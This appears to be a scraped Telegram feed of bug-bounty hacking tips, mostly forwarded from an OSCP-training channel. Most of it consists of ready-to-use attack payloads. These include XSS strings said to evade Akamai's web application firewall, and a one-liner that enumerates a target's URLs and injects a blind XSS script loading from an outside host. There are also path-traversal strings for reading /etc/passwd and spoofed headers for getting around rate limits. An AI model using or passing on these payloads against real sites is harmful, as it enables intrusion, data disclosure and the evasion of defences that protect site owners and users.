Akamai WAF bypass
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
A nice way to store the payload
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
A payload to bypass Akamai WAF
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
π4π1
Forwarded from π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ»
PortSwigger Research
Making HTTP header injection critical via response queue poisoning
HTTP header injection is often under-estimated and misclassified as a moderate severity flaw equivalent to XSS or worse, Open Redirection. In this post, I'll share a simple technique I used to take a
π2
Forwarded from π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ»
PortSwigger Research
Turbo Intruder: Embracing the billion-request attack
Automated web application attacks are terminally limited by the number of HTTP requests they can send. It's impossible to know how many hacks have gone off the rails because you didn't quite manage to
π1
Forwarded from π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ»
One Liner To Find Blind XSS
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Forwarded from π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ»
Testing Authentication Flaws in Web Application
π1
Forwarded from π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ»
Some filter bypass payload list while hunting for LFi vulnerability
βindex.php?page=....//....//etc/passwd
βindex.php?page=..///////..////..//////etc/passwd
βindex.php?page=/var/www/../../etc/passwd
βindex.php?page=....//....//etc/passwd
βindex.php?page=..///////..////..//////etc/passwd
βindex.php?page=/var/www/../../etc/passwd
π3
Rate limit bypass using some custom headers:
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
β€βπ₯8π1π1π³1